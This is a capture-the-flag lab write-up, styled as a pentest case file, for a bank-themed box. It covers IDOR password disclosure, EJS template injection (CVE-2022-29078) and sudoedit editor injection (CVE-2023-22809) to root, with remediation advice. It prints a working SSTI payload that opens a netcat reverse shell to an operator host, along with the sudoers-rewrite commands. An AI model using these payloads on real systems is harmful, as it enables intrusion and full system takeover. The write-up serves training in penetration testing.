Case file

IDOR to EJS SSTI and sudoedit editor escape

Foundations web engagement: vhost and low-priv login led to IDOR password disclosure; EJS CVE-2022-29078 yielded RCE as web; sudoedit with CVE-2023-22809-style editor injection rewrote sudoers for root.

Foundations28 minLinux · Web · IDOR · SSTI · Privilege Escalation
  • admin.cyprusbank.thm accepted Olivia’s credentials; IDOR leaked Gayle’s password. EJS SSTI opened a shell; sudoedit on an nginx site file with a crafted EDITOR planted full sudo.

  • ffuf found admin.cyprusbank.thm. Olivia’s session plus /messages/?c= leaked Gayle’s password.

  • Gayle’s settings POST injected outputFunctionName with child_process.execSync for a reverse shell.

  • SUDO_EDITOR pointed at /etc/sudoers; after editing, sudo su returned root.

01

Engagement summary

admin.cyprusbank.thm accepted Olivia’s credentials; IDOR leaked Gayle’s password. EJS SSTI opened a shell; sudoedit on an nginx site file with a crafted EDITOR planted full sudo.

WHITEROSE (10.10.200.189 / cyprusbank.thm) exposed nginx and an admin vhost. Provided credentials Olivia Cortez / olivi8 authenticated to the panel. messages/?c= accepted sequential IDs — c=10 disclosed Gayle Bev’s password. Gayle’s settings endpoint accepted a settings[view options][outputFunctionName] payload (CVE-2022-29078) that execSync’d a reverse shell as web. sudo -l allowed sudoedit on /etc/nginx/sites-available/admin.cyprusbank.thm; exporting SUDO_EDITOR to open /etc/sudoers (CVE-2023-22809 technique) let us grant web NOPASSWD ALL and sudo su to root.

Business impact

IDOR on messaging is credential theft. Unpatched EJS is RCE. sudoedit that honors attacker-controlled editor arguments is root. Fix object references, upgrade EJS past CVE-2022-29078, and patch sudo for CVE-2023-22809.

02

Vhost, login, and IDOR

ffuf found admin.cyprusbank.thm. Olivia’s session plus /messages/?c= leaked Gayle’s password.

OPERATOR · VHOST

savvy@lab:~$ echo '10.10.200.189 cyprusbank.thm admin.cyprusbank.thm' | sudo tee -a /etc/hosts

savvy@lab:~$ ffuf -w subdomains-top1million-110000.txt -u http://cyprusbank.thm/ -H "Host: FUZZ.cyprusbank.thm" -fw 1

admin

# login Olivia Cortez / olivi8 → messages/?c=10 → Gayle Bev password

03

EJS SSTI RCE (CVE-2022-29078)

Gayle’s settings POST injected outputFunctionName with child_process.execSync for a reverse shell.

PAYLOAD

name=a&password=a&settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('busybox nc OPERATOR_IP 1234 -e bash');s

OPERATOR · SHELL

savvy@lab:~$ nc -lnvp 1234

savvy@lab:~/app$

savvy@lab:~$ id

uid=1000(web) gid=1000(web)

04

sudoedit editor escape to root

SUDO_EDITOR pointed at /etc/sudoers; after editing, sudo su returned root.

OPERATOR · SUDOEDIT

savvy@lab:~$ sudo -l

(root) NOPASSWD: sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm

savvy@lab:~$ export SUDO_EDITOR='nano -- /etc/sudoers'

savvy@lab:~$ sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm

# add: web ALL=(root) NOPASSWD: ALL

savvy@lab:~$ sudo su

root@lab:~# id

uid=0(root) gid=0(root) groups=0(root)

Remediation

Authorize message access by ownership, not sequential IDs. Upgrade EJS; reject nested settings injection. Patch sudo and avoid sudoedit on paths that interact with writable directories.